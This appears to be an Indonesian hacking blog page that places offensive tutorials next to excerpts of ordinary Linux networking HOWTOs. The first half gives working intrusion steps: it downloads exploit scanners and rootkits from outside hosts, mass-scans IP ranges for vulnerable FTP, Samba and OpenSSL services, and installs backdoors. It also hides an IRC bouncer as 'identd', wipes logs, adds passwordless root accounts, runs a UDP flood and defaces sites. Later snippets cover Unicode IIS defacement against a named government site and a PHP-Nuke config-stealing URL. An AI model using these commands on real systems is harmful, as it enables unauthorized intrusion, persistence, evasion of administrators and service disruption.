Google hacking

======lain sok pinter tapi keur iseng======

pertama : buka google.com 
          allinurl:  cgi/file= .htm  <==< copi masukin ke search google

 Continue reading 'Google hacking'

Local Exploit

Cracking Root
=======================================================

Tips:
mkdir .bash            <----untuk membuat direktori bash
cd .bash                 <---untuk masuk ke direktori bash

mkdir <direktory>  <--- untuk membuat direktory baru

cd <direktory>       <--- untuk masuk ke direktory yg anda mau

cd /                        <--- untuk keluar dari suatu direktory

rm -rf  <file>          <--- untuk menghapus file/direktory

  Continue reading 'Local Exploit'

RootKit

First you need a shell witch you will scan for other shells/roots with this 
scanner: 
wget http://dalnet.bumerang.ro/linux/xpl/wu2.tar.gz 
after you download it, start scaning: 
tar -xzvf wu2.tar.gz 
unpacking the arhive 
cd alpyftpd/ 
./scan 203 21 180 
203 - first IP class 
21 - its necesary, its the FTP port, the exploit its for FTP 
180 - second IP class 
wew

rootkit: 
its a backdoor witch lets you connect to the server throught another port and 
pass set by you.that makes you invisible, hides screen, ps, w, last and all your 
procces. 
wget http://dalnet.bumerang.ro/linux/rk/X.tar.gz 
tar -xzvf X.tar.gz 
unpacking the arhive 
cd X/ 
./install root password port e-mail 
root - its necesary, its the ID 
password - its set the password you want for root 
port - the port you connect through on ssh 
e-mail - your mail to recive the information about the server and your options 
Example: 
./install root dexter 1402 dextervaneza@yahoo.com 
that means you connect to server on port 1402 with id root and password 

ATENTION ::. 
untuk xpost scanner :
liad di bawah ini :
wget http://www.cyberborneo.com/tools/xpost.tgz 
tar -zxvf xpost.tgz 
cd xpost 
cd xwurm 
./scan 200.152 
When scan finished type 
./masswu wu-scan.log 
And if another IP SAY SECCUES u HAVE ROOT ON THIS IP... 
u must to connect on it with awu if u don't have awu then get it 

wget www.geocities.com/blackhat12001/dimi.tgz 
tar -zxvf dimi.tgz 
cd awu 
./wu -a -d IP ( or box so sayed Succes) 

when he coonnect on box 
type: 
cd /dev 
mkdir .p 
cd .p 
wget www.geocities.com/blackhat12001/r00tk1t.tgz 
tar -zxvf r00tk1t.tgz 
cd shv4 
./setup [password] [port] 
port mematikan : 53

remove lOg

198.26.132.121 80 <-- proxy
http://rpmfind.net
http://www.vip-hosting.com<---order Ds by qchex

insstal wget :
=====================
ftp://rpmfind.net/linux/redhat/updates/6.2/en/os/i386/wget-1.8.2-4.6x.i386.rpm
rpm -ivh ftp://rpmfind.net/linux/redhat/updates/6.2/en/os/i386/wget-1.8.2-4.6x.i386.rpms
cara lain :
ftp rpmfind.net
login : anonymous
pass : admin@
cd linux/redhat/6.2/en/os/i386/RedHat/RPMS/
get wget-1.5.3-6.i386.rpm
keluar dari ftp : bye
rpm -ivh wget-1.5.3-6.i386.rpm
finish :)

install pico dan remove.c
================================
ftp://rpmfind.net/linux/redhat/updates/9/en/os/i386/pine-4.44-19.90.0.i386.rpm <-- instal pico 
ftp://rpmfind.net/linux/redhat/9/en/os/i386/RedHat/RPMS/pidentd-3.0.14-11.i386.rpm <---ident
di file etc
yang deafultnyo
ex :buang yang nggak perlu
buang yang ngga perlu di identd.conf
ftp://dajal:p3l3rku@dajal.netfirms.com/www/rem  <---remove.c jejak

----------------------------------------------------------------------------------

Instalasi Pysbnc

mkdir "...." <<-- ini dia direktori kita setelah itu kita masuk ke direktori tersebut
cd "...." <<-- masuk ke direktori 
wget wget http://www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
mv psyBNC2.2.1-linux-i86-static.tar.gz .sh
tar -zxvf .sh 
mv psybnc .log
cd .log
make  
echo "PSYBNC.SYSTEM.PORT1=110"  >> user.conf
echo "PSYBNC.SYSTEM.HOST1=*" >> user.conf
echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> user.conf
pwd
/home/scut/..../.log
ketik command:
PATH=$PATH:/home/scut/"...."/.log
mv psybnc "[identd] " 
mv scut.conf "  "
"[identd] " "  " 

 .-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
 ,----.,----.,-. ,-.,---.,--. ,-.,----.
 | O || ,-' \ \/ / | o || \| || ,--'
 | _/ _\ \ \ / | o< | |\ || |__
 |_| |____/ |__| |___||_| \_| \___|
 Version 2.2.1 (c) 1999-2000  the most psychoid  and the cool lam3rz Group IRCnet
 `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
 Configuration File:
 No logfile specified, logging to log/psybnc.log
 Listening on: 0.0.0.0 port 11111
 psyBNC2.2.1-cBtITLdDMSNp started (PID 2291)
 [scut@d11303 .log]$

 ps -x untuk mengetahui proses  di background shell 
 [scut@d11303 .log]$ ps -x
 PID TTY STAT TIME COMMAND
 31544 ? S 0:16 ./bash
 31629 ? S 0:06 sendmail to scut
 2212 pts/1 S 0:00 -bash
 2291 pts/1 S 0:00 [identd]
 2309 pts/1 R 0:00 ps -x
 catatan: 2291 pts/1 S 0:00 [identd] <<-- ini adalah background
 psybnc anda yang berubah setelah kita lakukan trik tersebut namun jangan keburu gembira dahulu, karena mungkin admin curiga dengan background yang ada di server tersebut dan admin akan mencarinya dengan:

find | grep psybnc <<-- kemungkinan yang dilakukan karena biasanya admin tahu kalau user selalu run psybnc maka akan nampak nama nama psybnc anda 
./log/psybnc.log
./log/psybnc.log.old
./psybncchk
./psybnc.pid

Untuk itu kita perlu mengganti nama nama tersebut dengan yang lain semisal 
[scut@d11303 .log]$ mv psybnc.pid .log
[scut@d11303 log]$ mv psybnc.log .sh
[scut@d11303 log]$ mv psybnc.log.old .mud

Dengan cara tersebut kemungkinan sang admin nggak akan curiga  terhadap background yang ada di server anda ;) dan yang terakhir jangan lupa bersihkan log anda dengan mengetik command:
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
Atau bisa juga menggunakan remove.c yang ada di situs k-elektronik :)  selamat mencoba dan ini hanyalah

Tuturial pakai Exploit

Cara I
1. wget http://www.renjana.com/xb.tar.gz 
2. tar -zxvf xb.tar.gz 
3. cd xb 
4. ./xbrute IP
----------------------------------------------------------------------------------
Cara open-ssl :
*
   ./openssl-too-open -a 0x7 -v 
   ./openssl-too-open -a 0x10 -v
   ./openssl-too-open -a 0x14 -v 

./mapache 200 443 10 10
./apache target
----------------------------------------------------------------------------------
cara FTP:
wget pembalap.us/ftp.tgz
tar
cd ftp
./scan ip1 port ip2 ip3
----------------------------------------------------------------------------------
Sambel :

http://www.packetstormsecurity.nl/0304-exploits/sambal.c
gcc -o sambal sambal.c
Scan :
./sambal -d 0 -C 60 -S 192.168.0

Tembak :
./sambal -b 0 -v 192.168.0.133

Klo Dpt :

http://utay-doyan.cc/shv4.tar.gz
tar 
cd
./setup medah 4500 jadi login root ssh port 4500
----------------------------------------------------------------------------------
PATCH

root@redeye samba]# /etc/init.d/smb stop
Shutting down SMB services: [ OK ]
Shutting down NMB services: [ OK ]
[root@redeye root]# cd /etc/samba
[root@redeye samba]# wget http://master.samba.org/samba/ftp/patches/patch-2.2.8-2.2.8a.diffs.gz
[root@redeye samba]# gunzip patch-2.2.8-2.2.8a.diffs.gz
[root@redeye samba]# patch -p1 < patch-2.2.8-2.2.8a.diffs
[root@redeye samba]# /etc/init.d/smb start
----------------------------------------------------------------------------------
Ddos attack :
wget http://packetstormsecurity.nl/DoS/udp.pl
perl udp.pl target 0 0
----------------------------------------------------------------------------------
Deface
cd /
cd var/www
masuk ke html
wget file index aja disana 
chmod +x index
-------------------------------
echo <-- hapus jejak

masuk di direct root
ls -al
echo <[namafile]
------------------------------------
Add user dlm Root:
1.
/usr/sbin/useradd pembalap -g wheel -s /bin/bash -d /etc/.pembalap
passwd -d pembalap

/usr/sbin/useradd jacky -g wheel -s /bin/bash -d /etc/.jacky
passwd -d jacky

2.
/usr/sbin/adduser pembalap -g root -d /home/pembalap -s /bin/bash
passwd -d pembalap

/usr/sbin/adduser ftp -g root -d /home/jacky -s /bin/bash
passwd -d ftp

/usr/sbin/useradd mailbin -c mail -d /var/spool/mail

**
/usr/sbin/useradd yiping -g root -u 0 -d / 
passwd -d yiping

/usr/sbin/useradd pir -g root -u 0 -d / 
passwd -d pir

/etc/httpd/conf/httpd.conf

/etc/init.d/httpd restart
ok

Del User
/usr/sbin/userdel  Continue reading 'Tuturial pakai Exploit'

IP Sub-Networking Mini-Howto


Robert Hart, hartr@interweft.com.au

v1.1, 30 August 2001


This document describes why and how to subnetwork an IP network – that is using a single A, B or C Class network number to function correctly on several interconnected networks.


Continue reading ‘IP Sub-Networking Mini-Howto’

Setting up IP Aliasing on A Linux Machine Mini-HOWTO

Harish Pillay

 h.pillay@ieee.org

Joy Yokley – Converted document from HTML to DocBook v4.1 (SGML)

2001-01-23

Revision History
Revision 1.2 2001-01-26 Revised by: JEY
 
Revision 1.1 2001-01-24 Revised by: JEY
 
Revision 1.0 1997-01-13 Revised by: HP
 

This is a cookbook recipe on how to set up and run IP aliasing on a Linux box and how to set up the machine to receive e-mail on the aliased IP addresses.


Continue reading ‘Setting up IP Aliasing on A Linux Machine Mini-HOWTO’

Cable Modem Providers HOWTO

Vladimir Vuksan

            vuksan@veus.hr

Revision History
Revision v4.30 June 13, 2001 Revised by: vv
Many different updates.

This document attempts to answer basic questions on how to connect your Linux box to cable modem or cable Internet provider.


Continue reading ‘Cable Modem Providers HOWTO’

VPN HOWTO

Matthew D. Wilson

matthew@shinythings.com

Dec 1999

Revision History
Revision 2.0 2002-05-30 Revised by: tab
Updated to Docbook 4.1 and applied GFDL per Matthew Wilson
Revision 1.0 1999-12-01 Revised by: mdw
Initial release

This HOWTO describes how to set up a Virtual Private Network with Linux.


T Continue reading ‘VPN HOWTO’

DSL HOWTO for Linux

Hal Burgiss

     hal@foobox.net

Original Author: David Fannin

Edited by

Greg LeBlanc

v1.71, 2002-07-21

Revision History
Revision v1.71 2002-07-21 Revised by: hb
Add another supported modem only.
Revision v1.7 2002-07-14 Revised by: hb
More small updates.
Revision v1.6 2002-05-23 Revised by: hb
Various small updates.
Revision v0.92 1999-04-10 Revised by: df
First release (ADSL mini HOWTO).

This document examines the DSL family of high speed Internet services now being deployed in various markets worldwide. Information is included on the technology behind DSL as well as subscribing, installing, configuring, and troubleshooting, with an emphasis on how this impacts Linux users.


Continue reading ‘DSL HOWTO for Linux’

Bandwidth Limiting HOWTO

Tomasz Chmielewski

tch@metalab.unc.edu

Revision History
Revision 0.9 2001-11-20 Revised by: tc
 

This document describes how to set up your Linux server to limit download bandwidth or incoming traffic and how to use your internet link more efficiently.


Continue reading ‘Bandwidth Limiting HOWTO’

ADSL Bandwidth Management HOWTO

 

 

Dan Singletary

 

 

<dvsing@sonicspike.net>

Revision History
Revision 1.3 2003-04-07 Revised by: ds
Added links section.
Revision 1.2 2002-09-26 Revised by: ds
Added link to new Email Discussion List. Added small teaser to caveat section regarding new and improved QoS for Linux designed specifically for ADSL to be released soon.
Revision 1.1 2002-08-26 Revised by: ds
A few corrections (Thanks to the many that pointed them out!). Added informational caveat to implementation section.
Revision 1.0 2002-08-21 Revised by: ds
Better control over bandwidth, more theory, updated for 2.4 kernels
Revision 0.1 2001-08-06 Revised by: ds
Initial publication

This document describes how to configure a Linux router to more effectively manage outbound traffic on an ADSL modem or other device with similar bandwidth properties (cable modem, ISDN, etc). Emphasis is placed on lowering the latency for interactive traffic even when the upstream and/or downstream bandwidth is fully saturated.


 

Continue reading ‘ADSL Bandwidth Management HOWTO’

Transparent Proxy with Linux and Squid mini-HOWTO


Daniel Kiracofe

v1.15, August 2002


This document provides information on how to setup a transparent caching HTTP proxy server using only Linux and squid.


Continue reading ‘Transparent Proxy with Linux and Squid mini-HOWTO’

Buat WEBSERVER sendiri bagaimana?

iptables -t nat -A PREROUTING -i eth0 -s ! squid-box -p tcp –dport 80 -j DNAT –to squid-box:3128

iptables -t nat -A POSTROUTING -o eth0 -s local-network -d squid-box -j SNAT –to iptables-box

iptables -A FORWARD -s local-network -d squid-box -i eth0 -o eth0 -p tcp –dport 3128 -j ACCEPT

cgi-telnet

#!/usr/bin/perl
#——————————————————————————
# Copyright and Licence
#——————————————————————————
# CGI-Telnet Version 1.0 for NT and Unix : Run Commands on your Web Server
#
# Copyright (C) 2001 Rohitab Batra
# Permission is granted to use, distribute and modify this script so long
# as this copyright notice is left intact. If you make changes to the script
# please document them and inform me. If you would like any changes to be made
# in this script, you can e-mail me.
#
# Author: Rohitab Batra
# Author e-mail: rohitab@rohitab.com
# Author Homepage: http://www.rohitab.com/
# Script Homepage: http://www.rohitab.com/cgiscripts/cgitelnet.html
# Product Support: http://www.rohitab.com/support/
# Discussion Forum: http://www.rohitab.com/discuss/
# Mailing List: http://www.rohitab.com/mlist/
#——————————————————————————
Continue reading ‘cgi-telnet’

INSTALL CONFIGURE MRTG

############################
###INSTALL CONFIGURE MRTG###
############################

1.zlib install
download zlib-1.2.2.tar.gz
tar -zxvf zlib-1.2.2.tar.gz
./configure –prefix=/usr/zlib
make
make install
Continue reading ‘INSTALL CONFIGURE MRTG’

SQL Injection for admin.asp

Yang di maksud denngan SQL Injection ialah memasukkan kode² SQL untuk mendapatkan acces kedatabase yang lebih besar daripada yang seharusna kita dapatkan, terutama pada script yang tidak memvalidasi input dari user.
Sebenarna ini bug sudah lama sekali,tapi yang namana ilmu gak ada basina kan… 🙂

Continue reading ‘SQL Injection for admin.asp’

PANHAC2 segera ke kota Anda !

  

  National Hacking Competition (PANHAC) 2007

 
Pazia – Acer National Hacking Competition 2 akan segera diselenggarakan

di sepuluh  kota Indonesia dengan hadiah utama Notebook Acer Ferrari 1005, piala bergilir PANHAC, voucher training dan ujian bersertifikasi FORTINET, untuk pemenang kedua Acer LCD Monitor 17″ dan pemenang ketiga Samsung MFP Laser Printer SCX-4521. Continue reading ‘PANHAC2 segera ke kota Anda !’

Cisco Router 2700 Paling Setan

Router_Pdg#sh run
Building configuration…

Current configuration:
!
version 12.0
service timestamps debug uptime
service timestamps log uptime
service password-encryption
! Continue reading ‘Cisco Router 2700 Paling Setan’

Cisco Acceslist

access-list 150 permit ip 216.236.107.0 0.0.0.255 any log
access-list 150 permit tcp 216.236.107.0 0.0.0.255 any log
access-list 150 permit udp 216.236.107.0 0.0.0.255 any log
access-list 150 permit icmp 216.236.107.0 0.0.0.255 any log
access-list 150 permit ip 202.173.95.0 0.0.0.255 any log
access-list 150 permit ip 202.173.92.0 0.0.0.255 any log
access-list 150 permit tcp 202.173.92.0 0.0.0.255 any log
access-list 150 permit tcp 202.173.95.0 0.0.0.255 any log
access-list 150 permit icmp 202.173.92.0 0.0.0.255 any log
access-list 150 permit icmp 202.173.95.0 0.0.0.255 any log
access-list 150 permit udp 202.173.95.0 0.0.0.255 any log
access-list 150 permit udp 202.173.92.0 0.0.0.255 any log
access-list 150 permit ip 202.152.18.160 0.0.0.15 any log
access-list 150 permit tcp 202.152.18.160 0.0.0.15 any log
access-list 150 permit icmp 202.152.18.160 0.0.0.15 any log
access-list 150 permit udp 202.152.18.160 0.0.0.15 any log
access-list 150 deny   ip any any log
access-list 150 deny   tcp any any log
access-list 150 deny   icmp any any log
access-list 150 deny   udp any any log

Mbah DeGleng

Untuk nggoreng yes, Akses yesWeh kok ganti total. Weleh weleh tulisan sak arat arat dari 2 tahun lalu jadi ilang, dah. Yah nulis lagi, nggambar lagi. Ini photo ruang tempat aku melihat dunia. Dunia yang aku lihat dari tengah hutan, jauh dari peradaban manusia, tapi dekat dengan peradaban binatang, qe3. Walau dekat dengan peradaban binatang, tapi ada internet, ada GSM, ada CDMA, ada voip, ada ITG, ada AP, yah pokoknya ada teknologi canggih layaknya di tengah kota Jakarta, dah. Namanya juga base camp, gak ada tembok, adanya rumah panggung dari kayu. Raket nyamuk gak ketinggalan. Wajan penggorengan itu menangkap sinyal AP dari kantor yang jaraknya 2 km. Akoe mengoendjoengi wedoes wedoes tjeting dari sitoe. Semua urusan peradaban modern, dari urusan bank sampai pembaayaran semua tagihan, selesai dengan stick stylus Pocket PC dan mouse komputer. Hidup ini simple dan mudah, jika kita mampu memanfaatkannya kemudahan di sekitar kita. Walau di tengah hutan sekalipun, qe3.

Rgds
deGleng

Keamanan Jaringan Linux

images.jpgKeamanan jaringan menjadi semakin penting dengan semakin banyaknya waktu yang dihabiskan orang untuk berhubungan. Mengganggu keamanan jaringan sering lebih mudah daripada fisik atau lokal, dan lebih umum.

Terdapat sejumlah alat yang baik untuk membantu keamanan jaringan, dan semakin banyak disertakan dalam distribusi Linux. Continue reading ‘Keamanan Jaringan Linux’

Security Vulnerability in PHP-Nuke Allows File Copying (admin.php)

Security Vulnerability in PHP-Nuke Allows File Copying (admin.php)

Vulnerable systems:
PHP-Nuke 5.2 and prior

Immune systems:
PHP-Nuke 5.0 RC1 (only this one)

Exploit:
First run the following URL:
http://www.example.net/admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php&userfile_name=hacked.txt
(NOTE: URL wrapped for readability)
 Continue reading 'Security Vulnerability in PHP-Nuke Allows File Copying (admin.php)'

Shopper CGI BUG

-=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=-
: Tutorial : Shopper CGI BUG           		      :	
: Author   : NgaNgo                                   :
: For      : Pagaruyung Crew (http://www.mhcrew.org)  :   
: Contact  : ngango77@telkom.net		      :
-=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=-

Sebenarnya ini merupakan bug yang sangat lama sekali, jadi gue gak tanggung jawab
apabila tutorial ini gak menghasilkan apa-apa buat loe.

bagi yang sudah mengetahui bug ini, gak usah cape-cape baca lagi dan di minta 
koreksinya.
 Continue reading 'Shopper CGI BUG'

Remote root Telnetd

Title = Remote root Telnetd
        * bug found by scut 2001/06/09
        further research by smiler, zip, lorian and me.
        thanks to zip's cool friend for giving me a testbed to play on
        tested against: BSDI BSD/OS 4.1
                  NetBSD 1.5
                  FreeBSD 3.1
                  FreeBSD 4.0-REL
                  FreeBSD 4.2-REL
                  FreeBSD 4.3-BETA
                  FreeBSD 4.3-STABLE
                  FreeBSD 4.3-RELEASE
AUTHOR = JoeGoeL aka CyberRioT of MedanHacking
File   = Private! only crew
Date   = 2 Agustus 2001
Credit = TESO TEAM SECURITY
Greetz=  Cronost,Crafter`13,r3v0lt,dis0rder,Tua-Xiong,Seven_Fly,Breng-Sex,LuVcris,
         tapuz,Joe-Black,w|p,StripCode,Yourname
         WOH(VAndal,[RaFa],FonE_TonE,r00t,n0|d,Nu|l)
FUCk    = INDONESIAN MILITARY
sploit  =  7350854.c www.hack.co.za Continue reading 'Remote root Telnetd'

~*~DEFACING NT WEB SERVER WITH BUG UNICODE MICROSOFT IIS~*~

Melalui tutor ini saya teh hanya ingin berbagi pengalaman mengenai cara men-deface website yang menggunakan Microsoft Internet Information Server atau Microsoft IIS. Harap DeFaceR (sebutan bagi org yg suka deface..;p) ketahui…Microsoft Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang dinamakan “unicode bug”. Sayah tidak akan menjelaskan panjang lebar mengenai “unicode bug” ini karena sayah takut salah menjelaskan (ssSSTTtHHH!! jgn bilang sapa2 yah sebenernyah sayah teh emang gak tau …ehehehheehhe..;p~). Yang jelas dengan bug ini kita bisa mengeksplorasi komputer target dengan hanya menggunakan internet browser. Continue reading ‘~*~DEFACING NT WEB SERVER WITH BUG UNICODE MICROSOFT IIS~*~’

Tutorial Unicode By Jangkr|k/Ga|b

Tutorial Unicode By Jangkr|k/Ga|b  ( Crew Of MinangCrew, Hackermuda, Makassarhack, K-elektronik, Deface-team, Padanghacking, Indohack, Aritechdev, Neoteker, Indoprovider, Validcc, Medanhacking ...etc)
Os Target Windows Nt /9x
Ini HendakNya Dijadikan Bahan Percobaan yang Bermanfaat Yach
DediCated Toturial To : Pepole On irc.dal.net
		chanel: #MinangCrew, #K-elektronik,#Hackermuda, #Deface-team, #Makassarhack, #Indohack
			#IndoCarding, #Cracxer,#Cacing,#CrackerLink, #MedanHacking, #Aritechdev,#Neoteker ...etc
_________________________________________________________________________________________________________________________________________________________________________________________________
1. Kita Harus menentukan WebSite Target/ Sasaran Kita : www.target.loe contoh-->> www.polri.go.id  Continue reading 'Tutorial Unicode By Jangkr|k/Ga|b'

Linux Security Dengan Firewall IP Chains

Linux Security Dengan Firewall IP Chains

Jasakom – Ipchains adalah suatu utility yang meng-handle ‘packet filtering’ di Linux berbasis kernel 2.2.x. Pada Linux berbasis kernel 2.4.x, fungsi ipchains digantikan dengan iptables yang merupakan pengembangan dari ipchains itu sendiri serta ditambah beberapa fungsi baru untuk meningkatkan security. Continue reading ‘Linux Security Dengan Firewall IP Chains’

Judul : TUTORIAL UNICODE

Judul : TUTORIAL UNICODE
Oleh : r3v0lt
Reader : Private!!!
Just only crew ————————————————
Target : http://www.target.loe
Login : ada beberapa contoh login diantaranya :
a) _vti_bin
b) cgi-bin
c) scripts
d) msadc Unicode : Continue reading ‘Judul : TUTORIAL UNICODE’